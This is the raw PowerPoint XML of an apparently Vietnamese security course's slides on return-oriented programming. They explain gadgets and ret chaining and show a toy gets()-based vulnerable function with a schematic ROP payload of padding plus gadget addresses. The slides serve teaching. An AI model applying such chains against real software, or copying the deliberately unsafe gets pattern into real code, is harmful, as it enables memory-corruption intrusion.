              <a:rPr kumimoji="0" lang="en" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1600" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2567431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526D-CD4B-7597-C85C-E47DB19D5D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Return-oriented programming (ROP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA631F32-A75A-19EB-42F4-E98C990568EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thay vì thực thi toàn bộ một hàm, có thể thực thi các mảnh của các hàm được đặt ở các vị trí khác nhau.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Không cần EIP phải nhảy tới đầu hàm mà chỉ cần nhảy tới vị trí ở giữa hàm mà có đoạn mã cần thực hiện</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Gadget: một đoạn mã nhỏ chứa các lệnh đã được nạp vào trong bộ nhớ:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thường kết thúc bởi lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Không phải là một hàm đầy đủ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Chiến thuật của ROP: ghi đè một chuỗi các địa chỉ trả về, bắt đầu ở ô nhớ chứa giá trị RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mỗi địa chỉ trả về trỏ tới 1 gadget</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Gadget thực thi và kết thúc với một lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lệnh ret thực thi khiến cho EIP nhảy tới gadget tiếp theo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDD754F-09B1-50DD-2D9E-A0FA25AF213F}"/>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11004823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A66-9A2B-6D9A-3D99-10EB0CA69E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ROP – Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF3580D0-86D2-D150-F955-A767E82890B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="5257800" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Giả sử shellcode cần thực hiện 2 lệnh sau:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>mov $1, %eax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1600">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Các lệnh này nằm trong 2 hàm đã được nạp vào bộ nhớ:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>foo:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>         ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;foo+7&gt;  add $4, %esp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;foo+10&gt; xor %eax, %ebx</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;foo+12&gt; ret</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>bar:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>         ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;bar+22&gt; and $1, %edx</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;bar+25&gt; mov $1, %eax</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;bar+30&gt; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DCBC90-D539-9271-9929-EA9688737DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F6A6A8-18B6-6E09-ACAD-9708BAEFF6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374180532"/>
              </p:ext>
            </p:extLst>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main</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lang="en-GB" sz="1400" b="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP của main</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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1299456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A66-9A2B-6D9A-3D99-10EB0CA69E70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ROP – Ví dụ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00DCBC90-D539-9271-9929-EA9688737DC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Google Shape;625;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F7EF729-B3C4-C528-B9B6-BD03D1FD606A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1219200"/>
            <a:ext cx="2778950" cy="1231076"/>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2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Khai thác:</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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38761D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>'A' * 24</a:t>
            </a:r>
            <a:b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2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rPr>
              <a:t>[address of &lt;bar+25&gt;]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="12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200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[address of &lt;foo+10&gt;]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="7030A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t>    + ... (more chains)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="12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14" name="Google Shape;626;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5831716D-1000-8051-095E-11CB69DD80E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3022475" y="1075800"/>
            <a:ext cx="1955924" cy="443195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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>foo:</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A64D79"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>xor %eax, %ebx</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="7030A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bar:</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and $1, %edx</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chemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>    mov $1, %eax</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1" kern="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>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vulnerable:</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call gets</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
            </a:b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mov %ebp,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pop %ebp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main:</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call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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;629;p79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B581F3A3-18E5-857C-6A41-CAB872EC5BFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217200" y="2954875"/>
            <a:ext cx="2256950" cy="2031295"/>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100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void vulnerable(void)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char name[20];</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gets(name);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int main(void)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return 0;</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p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD67939B-1257-0D48-E20F-FA6FA45257A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2567292" y="3502264"/>
            <a:ext cx="762000" cy="307736"/>
            <a:chOff x="2133600" y="3886200"/>
            <a:chExt cx="1143000" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D264A98-0C75-EC08-54BE-5F7BC15E2EA9}"/>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32" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D133360A-6363-310F-1FE5-EB1635E68DF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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BFCD567-5197-A2DB-7DEB-AD68EB64324E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="915517210"/>
              </p:ext>
            </p:extLst>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main</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lang="en-GB" sz="1400" b="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP của main</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lang="en-GB" sz="1400" b="1">
                          <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>RIP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latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>SFP của vulnerable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name</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB8411FF-0B6A-6B75-A61C-C0F79A5B41C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="6025504"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="6025504"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Google Shape;914;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFE12B0C-E0EF-AD6F-9A66-2BE1865CD6C5}"/>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8" name="Google Shape;915;p76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E1596B-2127-BDC7-AC9E-9552CDE8DC8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="7"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9" name="Group 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{866C5CA9-5D3E-4C69-BB45-E91B1309706D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5105399" y="4189532"/>
            <a:ext cx="790803" cy="307736"/>
            <a:chOff x="5105399" y="4189532"/>
            <a:chExt cx="790803" cy="307736"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
